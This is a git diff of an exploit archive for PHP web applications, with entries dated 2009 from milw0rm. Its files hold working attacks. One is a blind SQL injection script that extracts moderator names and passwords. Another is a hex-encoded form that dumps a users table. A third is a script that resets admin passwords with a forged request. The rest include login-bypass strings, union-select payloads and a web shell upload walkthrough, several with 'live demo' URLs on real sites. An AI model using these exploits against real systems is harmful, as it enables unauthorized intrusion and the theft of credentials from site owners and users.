+    echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x77\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D'". $_POST[victim] ."\x2F\x63\x70\x2F\x62\x61\x63\x6B\x75\x70\x2E\x70\x68\x70\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x6E\x61\x6D\x65\x3D\x27\x61\x63\x74\x69\x6F\x6E\x27\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x79\x65\x73\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x68\x69\x64\x64\x65\x6E\x27\x20\x6E\x61\x6D\x65\x3D\x27\x74\x61\x62\x6C\x65\x6E\x5B\x5D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x63\x68\x65\x63\x6B\x65\x64\x3D\x27\x63\x68\x65\x63\x6B\x65\x64\x27\x20\x2F\x3E\x3C\x2F\x74\x64\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x32\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x75\x74\x74\x6F\x6E\x73\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x47\x65\x74\x20\x61\x63\x34\x70\x63\x6F\x6D\x5F\x75\x73\x65\x72\x73\x27\x20\x2F\x3E\x3C\x2F\x66\x6F\x72\x6D\x3E";
+} else{
+  echo "\x3C\x66\x6F\x72\x6D\x20\x6E\x61\x6D\x65\x3D\x27\x66\x6F\x72\x6D\x31\x27\x20\x65\x6E\x63\x74\x79\x70\x65\x3D\x27\x6D\x75\x6C\x74\x69\x70\x61\x72\x74\x2F\x66\x6F\x72\x6D\x2D\x64\x61\x74\x61\x27\x20\x61\x63\x74\x69\x6F\x6E\x3D\x27". $PHP_SELF ."\x3F\x51\x61\x62\x61\x6E\x64\x69\x3D\x31\x27\x20\x6D\x65\x74\x68\x6F\x64\x3D\x27\x70\x6F\x73\x74\x27\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x27\x20\x73\x69\x7A\x65\x3D\x27\x32\x35\x27\x20\x6E\x61\x6D\x65\x3D\x27\x76\x69\x63\x74\x69\x6D\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x56\x49\x43\x54\x49\x4D\x2F\x53\x43\x52\x49\x50\x54\x2F\x27\x20\x2F\x3E\x3C\x62\x72\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x27\x73\x75\x62\x6D\x69\x74\x27\x20\x6E\x61\x6D\x65\x3D\x27\x71\x75\x62\x27\x20\x76\x61\x6C\x75\x65\x3D\x27\x4E\x65\x78\x74\x27\x3E";
+}
+?>
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9075.txt b/platforms/php/webapps/9075.txt
index 41950c12d..798c41495 100755
--- a/platforms/php/webapps/9075.txt
+++ b/platforms/php/webapps/9075.txt
@@ -1,19 +1,19 @@
-#########################################################################
-[+] AdminLog 0.5 Login Bypass Vulnerability
-[+] Discovered By SirGod
-[+] http://insecurity-ro.org
-[+] http://h4cky0u.org
-[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
-#########################################################################
-
-[+] Login Bypass
-
- - Conditions : register_globals = ON
-
- - PoC
-
-      http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]
-
-#########################################################################
-
-# milw0rm.com [2009-07-02]
+#########################################################################
+[+] AdminLog 0.5 Login Bypass Vulnerability
+[+] Discovered By SirGod
+[+] http://insecurity-ro.org
+[+] http://h4cky0u.org
+[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
+#########################################################################
+
+[+] Login Bypass
+
+ - Conditions : register_globals = ON
+
+ - PoC
+
+      http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]
+
+#########################################################################
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9076.php b/platforms/php/webapps/9076.php
index 5aad18a64..6f6d4bdbb 100755
--- a/platforms/php/webapps/9076.php
+++ b/platforms/php/webapps/9076.php
@@ -1,201 +1,201 @@
- 2) {
-
-echo "\nPlease wait, this will take time, el9abr zain ;)\n";
-$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
-echo "\nExploiting:\n";
-$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
-$t = abs((100-($w/$r*100)));
-echo "Username: ";
-for ($i=1; $i <= 30; $i++) {
-
-  $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0");
-
-$laenge = strlen($q);
-   if (abs((100-($laenge/$r*100))) > $t-1) {
-      $count = $i;
-      $i = 30;
-   }
-}
-for ($j = 1; $j < $count; $j++) {
-   for ($i = 46; $i <= 122; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-
-
-                if ($j>9){
-      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i));
-              }
-
-                   if ($j<=9){
-      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i));
-
-            }
-            
-            
-
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-
-
-           if ($j>9){
-         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
-           }
-            if ($j<=9){
-                  $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
-
-            }
-      
-
-      
-      
-
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 122;
-      }
-   }
-}
-echo "\nPassword: ";
-for ($j = 1; $j <= 49; $j++) {
-   for ($i = 46; $i <= 102; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      
-
-             if ($j>9){
-
-     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i);
-
-  
-             }
-             
-                          if ($j<=9){
-
-     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i);
-
-  
-             }
-  
-
-      $laenge = strlen($hg);
-
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-        
-        
-             if ($j>9){
-
-         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
-             }
-
-                          if ($j<=9){
-
-         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
-             }
-             
-
-
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 102;
-      }
-   }
-}
-}
-?>
-
-# milw0rm.com [2009-07-02]
+ 2) {
+
+echo "\nPlease wait, this will take time, el9abr zain ;)\n";
+$r = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='1"));
+echo "\nExploiting:\n";
+$w = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and 1='0"));
+$t = abs((100-($w/$r*100)));
+echo "Username: ";
+for ($i=1; $i <= 30; $i++) {
+
+  $q = QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$i.",1))!='0");
+
+$laenge = strlen($q);
+   if (abs((100-($laenge/$r*100))) > $t-1) {
+      $count = $i;
+      $i = 30;
+   }
+}
+for ($j = 1; $j < $count; $j++) {
+   for ($i = 46; $i <= 122; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+
+
+                if ($j>9){
+      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".$i));
+              }
+
+                   if ($j<=9){
+      $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".$i));
+
+            }
+            
+            
+
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+
+
+           if ($j>9){
+         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
+           }
+            if ($j<=9){
+                  $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select name from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
+
+            }
+      
+
+      
+      
+
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 122;
+      }
+   }
+}
+echo "\nPassword: ";
+for ($j = 1; $j <= 49; $j++) {
+   for ($i = 46; $i <= 102; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      
+
+             if ($j>9){
+
+     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".$i);
+
+  
+             }
+             
+                          if ($j<=9){
+
+     $hg=QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".$i);
+
+  
+             }
+  
+
+      $laenge = strlen($hg);
+
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+        
+        
+             if ($j>9){
+
+         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1)) > '".($i-1)));
+             }
+
+                          if ($j<=9){
+
+         $laenge = strlen(QABANDI($host1,$userdir1,$userid1,$username1,$userpass1,"' and ascii(substring((select Password from almnzm_moderators limit 0,1),".$j.",1))>'".($i-1)));
+             }
+             
+
+
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 102;
+      }
+   }
+}
+}
+?>
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9077.txt b/platforms/php/webapps/9077.txt
index 70c0049fc..aa261621e 100755
--- a/platforms/php/webapps/9077.txt
+++ b/platforms/php/webapps/9077.txt
@@ -1,36 +1,36 @@
-########################################################################################################################
-#conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Exploit
-#=======================================================================================================================
-#
-#Critical Level : Dangerous
-#
-#Vendor site : http://www.conpresso.de/
-#
-#Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
-#
-#=======================================================================================================================
-#
-#
-#Exploit :
-#--------------------------------
-#
-#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=1
-#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=0
-#
-#Live demo :
-#--------------------------------
-#
-#http://www.maria-pawlowna.de/conpresso/Home/detail.php?nr=70+and+1=1
-#http://www.muenster.org/hittorf/hittorf/Schulleben/detail.php?nr=6501+and+1=0
-#
-#=======================================================================================================================
-#Discovered by : -tmh-
-#
-#Contact : tmh[at]no-trace.cc
-#
-#Greetz to : Team-Internet
-#
-#
-########################################################################################################################
-
-# milw0rm.com [2009-07-02]
+########################################################################################################################
+#conpresso 3.4.8 (detail.php) Remote Blind SQL Injection Exploit
+#=======================================================================================================================
+#
+#Critical Level : Dangerous
+#
+#Vendor site : http://www.conpresso.de/
+#
+#Download : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
+#
+#=======================================================================================================================
+#
+#
+#Exploit :
+#--------------------------------
+#
+#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=1
+#www.[URL]/[PATH]/detail.php?nr=[nr] and 1=0
+#
+#Live demo :
+#--------------------------------
+#
+#http://www.maria-pawlowna.de/conpresso/Home/detail.php?nr=70+and+1=1
+#http://www.muenster.org/hittorf/hittorf/Schulleben/detail.php?nr=6501+and+1=0
+#
+#=======================================================================================================================
+#Discovered by : -tmh-
+#
+#Contact : tmh[at]no-trace.cc
+#
+#Greetz to : Team-Internet
+#
+#
+########################################################################################################################
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9079.txt b/platforms/php/webapps/9079.txt
index 39db3a6cb..590b175fa 100755
--- a/platforms/php/webapps/9079.txt
+++ b/platforms/php/webapps/9079.txt
@@ -1,49 +1,49 @@
-###########################################################################
-#-----------------------------I AM MUSLIM !!------------------------------#
-###########################################################################
-
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-        [»] ~Fleck i love you :D hahaha
-==============================================================================
-        [»] Opial Version 1.0 (Auth Bypass) Remote Sql Injection
-==============================================================================
-
-	[»] Script:             [ Opial Version 1.0 ]
-	[»] Language:           [ PHP ]
-        [»] Download:           [ http://www.opial.com/ ]
-	[»] Founder:            [ Moudi or SixSo  ]
-        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
-        [»] Team:               [ EvilWay ]
-        [»] SiteWeb:            [ Visit - www.opensc.ws ]
-        [»] Price:              [ $35 - $155 ]
-
-###########################################################################
-
-===[ Exploit SQL ]===	
-	
-	[»] http://www.site.com/patch/admin/
-
-        [»] User Name : admin' or '1=1
-        [»] Password  : leave empty here
-
-===[ LIVE DEMO ]===	
-
-        [»] http://www.opial.com/demo/admin/
-
-        [»] User Name : admin' or '1=1
-        [»] Password  : 
-
-
-Author: Moudi
-
-###########################################################################
-
-# milw0rm.com [2009-07-02]
+###########################################################################
+#-----------------------------I AM MUSLIM !!------------------------------#
+###########################################################################
+
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+        [»] ~Fleck i love you :D hahaha
+==============================================================================
+        [»] Opial Version 1.0 (Auth Bypass) Remote Sql Injection
+==============================================================================
+
+	[»] Script:             [ Opial Version 1.0 ]
+	[»] Language:           [ PHP ]
+        [»] Download:           [ http://www.opial.com/ ]
+	[»] Founder:            [ Moudi or SixSo  ]
+        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
+        [»] Team:               [ EvilWay ]
+        [»] SiteWeb:            [ Visit - www.opensc.ws ]
+        [»] Price:              [ $35 - $155 ]
+
+###########################################################################
+
+===[ Exploit SQL ]===	
+	
+	[»] http://www.site.com/patch/admin/
+
+        [»] User Name : admin' or '1=1
+        [»] Password  : leave empty here
+
+===[ LIVE DEMO ]===	
+
+        [»] http://www.opial.com/demo/admin/
+
+        [»] User Name : admin' or '1=1
+        [»] Password  : 
+
+
+Author: Moudi
+
+###########################################################################
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9080.txt b/platforms/php/webapps/9080.txt
index d1f007138..84ed3a29b 100755
--- a/platforms/php/webapps/9080.txt
+++ b/platforms/php/webapps/9080.txt
@@ -1,19 +1,19 @@
-###################################################################
-###################################################################
-Opial 1.0 (albumid) Remote SQL Injection Vuln
-###################################################################
-Founder : ThE g0bL!N
-###################################################################
-###################################################################
-SQL Injection Vulnerability  
-###################################################################
-Exploit:
-###################################################################
-http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
-Demo:
-----
-http://www.opial.com/demo/
-####################################################################
-Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers
-
-# milw0rm.com [2009-07-02]
+###################################################################
+###################################################################
+Opial 1.0 (albumid) Remote SQL Injection Vuln
+###################################################################
+Founder : ThE g0bL!N
+###################################################################
+###################################################################
+SQL Injection Vulnerability  
+###################################################################
+Exploit:
+###################################################################
+http://www.path.com/albumdetail.php?albumid=-31+union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,user(),16--
+Demo:
+----
+http://www.opial.com/demo/
+####################################################################
+Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9081.txt b/platforms/php/webapps/9081.txt
index 11ae2199c..161650060 100755
--- a/platforms/php/webapps/9081.txt
+++ b/platforms/php/webapps/9081.txt
@@ -1,51 +1,51 @@
-###########################################################################
-#-----------------------------I AM MUSLIM !!------------------------------#
-###########################################################################
-
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-        [»] ~Fleck i love you :D hahaha
-==============================================================================
-        [»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ Rentventory ]
-	[»] Language:           [ PHP ]
-        [»] Download:           [ http://www.rentventory.com/ ]
-	[»] Founder:            [ Moudi or SixSo  ]
-        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em man .... ]
-        [»] Team:               [ EvilWay ]
-        [»] SiteWeb:            [ Visit - www.opensc.ws ]
-        [»] Price:              [ $39 ]
-
-###########################################################################
-
-===[ Exploit SQL ]===	
-	
-	[»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time
-
-===[ LIVE DEMO ]===	
-
-        [»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time
-
-===[ Exploit BLIND SQL ]===	
-
-       [»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time
-
-===[ LIVE DEMO ]===
-
-       [»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time
-
-
-Author: Moudi
-
-###########################################################################
-
-# milw0rm.com [2009-07-02]
+###########################################################################
+#-----------------------------I AM MUSLIM !!------------------------------#
+###########################################################################
+
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+        [»] ~Fleck i love you :D hahaha
+==============================================================================
+        [»] Rentventory PHP (SQL/Blind) Multiple Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ Rentventory ]
+	[»] Language:           [ PHP ]
+        [»] Download:           [ http://www.rentventory.com/ ]
+	[»] Founder:            [ Moudi or SixSo  ]
+        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em man .... ]
+        [»] Team:               [ EvilWay ]
+        [»] SiteWeb:            [ Visit - www.opensc.ws ]
+        [»] Price:              [ $39 ]
+
+###########################################################################
+
+===[ Exploit SQL ]===	
+	
+	[»] http://www.site.com/patch/?product=[SQL]&panel=rent%2Fselect_time
+
+===[ LIVE DEMO ]===	
+
+        [»] http://www.rentventory.com/demo/?product=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12&panel=rent%2Fselect_time
+
+===[ Exploit BLIND SQL ]===	
+
+       [»] http://www.site.com/patch/?product=[BLIND]&panel=rent%2Fselect_time
+
+===[ LIVE DEMO ]===
+
+       [»] http://www.rentventory.com/demo/?product=1+AND+SUBSTRING(@@version,1,1)=5&panel=rent%2Fselect_time
+
+
+Author: Moudi
+
+###########################################################################
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/php/webapps/9086.txt b/platforms/php/webapps/9086.txt
index 20eb5e98c..88ee1e298 100755
--- a/platforms/php/webapps/9086.txt
+++ b/platforms/php/webapps/9086.txt
@@ -1,24 +1,24 @@
-#################################################################################################################
-[+] MRCGIGUY Thumbnail Gallery Post 1b Remote File Upload Vuln
-[+] Discovered By ThE g0bL!N
-[+] Vendor:http://www.mrcgiguy.com/
-[+} Download:http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=6
-[+] Greets : SarBoT511 -Sub-ZeRo
-[+] Note: It is a Sex Site Thanx God For This Bug :)
-#################################################################################################################
-Exploit:
--------
-  1)Go To add Your Picture http://www.site.com/path/submit.cgi
-  2) Upload Your Shell.php
-  3) Image Properties And The link Of shell :)
- Exapmle:
- -------
- http://site.com/upload/68456_shell1.php
- Demo:
- ----
-http://www.myhotlinks.net/cgi-bin/tgp/submit.cgi
- 
- Hack it please :d
-################################################################################################################
-
-# milw0rm.com [2009-07-09]
+#################################################################################################################
+[+] MRCGIGUY Thumbnail Gallery Post 1b Remote File Upload Vuln
+[+] Discovered By ThE g0bL!N
+[+] Vendor:http://www.mrcgiguy.com/
+[+} Download:http://www.mrcgiguy.com/cgi-bin/freedown.cgi?id=6
+[+] Greets : SarBoT511 -Sub-ZeRo
+[+] Note: It is a Sex Site Thanx God For This Bug :)
+#################################################################################################################
+Exploit:
+-------
+  1)Go To add Your Picture http://www.site.com/path/submit.cgi
+  2) Upload Your Shell.php
+  3) Image Properties And The link Of shell :)
+ Exapmle:
+ -------
+ http://site.com/upload/68456_shell1.php
+ Demo:
+ ----
+http://www.myhotlinks.net/cgi-bin/tgp/submit.cgi
+ 
+ Hack it please :d
+################################################################################################################
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9087.php b/platforms/php/webapps/9087.php
index 1004634db..0b084a524 100755
--- a/platforms/php/webapps/9087.php
+++ b/platforms/php/webapps/9087.php
@@ -1,150 +1,150 @@
-......................";
-			}else{
-				
-			[/code]
-			
-		[-] Works On :
-		
-			1. Nwahy Articles v1
-				
-			2. Nwahy scripts v1
-
-			3. Nwahy book v1
-			
-		[-] Note : Path to Control Panel   "/admincp/" .
-
-	*/
-
-	error_reporting(0);
-	ini_set("max_execution_time",0);
-	ini_set("default_socket_timeout",5);
-
-
-	function Usage()
-	{
-			print "\n\n";
-			print "/------------------------------------------------------------\\\n";
-			print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
-			print "\------------------------------------------------------------/\n";
-			print "| [-] Author : rEcruit                                       |\n";
-			print "| [-] Mail   : recru1t@ymail.com                             |\n";
-			print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
-			print "\------------------------------------------------------------/\n";
-			print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
-			print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
-			print "| [-] HOST     : Target server (ip/hostname)                 |\n";
-			print "| [-] PATH     : Path to Nwahy Dir                           |\n";
-			print "| [-] Options  :                                             |\n";
-			print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
-			print "\------------------------------------------------------------/\n";
-			print "\n\n";
-
-		exit;
-	}
-
-
-	function Send()
-	{
-		Global $host,$path,$user,$pwd,$proxy;
-		
-		if(empty($proxy))
-		{
-			$Connect	= @fsockopen($host,"80") or die("[-] Bad Host .");
-		}else{
-			$proxy		= explode(":",$proxy);
-			$Connect	= @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
-		}
-		
-			$Payload	= "username={$user}&password={$pwd}";
-			$Packet		.= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
-			$Packet		.= "Host: {$host}\r\n";
-			$Packet		.= "Cookie: username={$user}\r\n";
-			$Packet		.= "X-Forwarded-For: 127.0.0.1\r\n";
-			$Packet		.= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$Packet		.= "Content-Length: ".(strlen($Payload))."\r\n";
-			$Packet		.= "Connection: close\r\n\r\n";
-			$Packet		.= $Payload;
-
-				fputs($Connect,$Packet);
-
-				while(!feof($Connect)) 
-				$Response	.= @fgets($Connect,2048);
-
-				fclose($Connect);
-		
-		return $Response;
-	}
-	
-	
-	function Login()
-	{
-		$Response	= @Send();
-
-			if(eregi("refresh",$Response))
-			{
-				$msg	= "[-] Password changed .\n";
-			}
-			elseif(eregi("
    ",$Response))
-			{
-				$msg	= "[-] Bad username .\n";
-			}
-			else
-			{
-				$msg	= "[-] Exploit failed .\n";
-			}
-
-		return $msg;
-	}
-
-
-
-	if ($argc < 3) Usage();
-
-	$host	= $argv[1];
-	$path	= $argv[2];;
-	$proxy	= $argv[3];
-
-	
-		Print "\r\n[-] Connecting to {$host} .... \r\n";
-		
-		while(1)
-		{
-			Print "[-] Username: ";
-
-			if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
-			{
-				Print "[-] New password: ";
-
-				if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
-				{
-					Print Login();
-					exit;
-				}
-
-
-			}
-
-
-		} //end while
-
-?>
-
-# milw0rm.com [2009-07-09]
+......................
    ";
+			}else{
+				
+			[/code]
+			
+		[-] Works On :
+		
+			1. Nwahy Articles v1
+				
+			2. Nwahy scripts v1
+
+			3. Nwahy book v1
+			
+		[-] Note : Path to Control Panel   "/admincp/" .
+
+	*/
+
+	error_reporting(0);
+	ini_set("max_execution_time",0);
+	ini_set("default_socket_timeout",5);
+
+
+	function Usage()
+	{
+			print "\n\n";
+			print "/------------------------------------------------------------\\\n";
+			print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
+			print "\------------------------------------------------------------/\n";
+			print "| [-] Author : rEcruit                                       |\n";
+			print "| [-] Mail   : recru1t@ymail.com                             |\n";
+			print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
+			print "\------------------------------------------------------------/\n";
+			print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
+			print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
+			print "| [-] HOST     : Target server (ip/hostname)                 |\n";
+			print "| [-] PATH     : Path to Nwahy Dir                           |\n";
+			print "| [-] Options  :                                             |\n";
+			print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
+			print "\------------------------------------------------------------/\n";
+			print "\n\n";
+
+		exit;
+	}
+
+
+	function Send()
+	{
+		Global $host,$path,$user,$pwd,$proxy;
+		
+		if(empty($proxy))
+		{
+			$Connect	= @fsockopen($host,"80") or die("[-] Bad Host .");
+		}else{
+			$proxy		= explode(":",$proxy);
+			$Connect	= @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
+		}
+		
+			$Payload	= "username={$user}&password={$pwd}";
+			$Packet		.= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
+			$Packet		.= "Host: {$host}\r\n";
+			$Packet		.= "Cookie: username={$user}\r\n";
+			$Packet		.= "X-Forwarded-For: 127.0.0.1\r\n";
+			$Packet		.= "Content-Type: application/x-www-form-urlencoded\r\n";
+			$Packet		.= "Content-Length: ".(strlen($Payload))."\r\n";
+			$Packet		.= "Connection: close\r\n\r\n";
+			$Packet		.= $Payload;
+
+				fputs($Connect,$Packet);
+
+				while(!feof($Connect)) 
+				$Response	.= @fgets($Connect,2048);
+
+				fclose($Connect);
+		
+		return $Response;
+	}
+	
+	
+	function Login()
+	{
+		$Response	= @Send();
+
+			if(eregi("refresh",$Response))
+			{
+				$msg	= "[-] Password changed .\n";
+			}
+			elseif(eregi("
    ",$Response))
+			{
+				$msg	= "[-] Bad username .\n";
+			}
+			else
+			{
+				$msg	= "[-] Exploit failed .\n";
+			}
+
+		return $msg;
+	}
+
+
+
+	if ($argc < 3) Usage();
+
+	$host	= $argv[1];
+	$path	= $argv[2];;
+	$proxy	= $argv[3];
+
+	
+		Print "\r\n[-] Connecting to {$host} .... \r\n";
+		
+		while(1)
+		{
+			Print "[-] Username: ";
+
+			if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
+			{
+				Print "[-] New password: ";
+
+				if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
+				{
+					Print Login();
+					exit;
+				}
+
+
+			}
+
+
+		} //end while
+
+?>
+
+# milw0rm.com [2009-07-09]
diff --git a/platforms/php/webapps/9088.txt b/platforms/php/webapps/9088.txt
index 91359efd9..177e03843 100755
--- a/platforms/php/webapps/9088.txt
+++ b/platforms/php/webapps/9088.txt
@@ -1,49 +1,49 @@
-#####################################################
-#----------------------------- Evil-Cod3r -------------------------------#                                      
-####################################################
-==============================================================================
-                      _      _       _          _      _   _
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
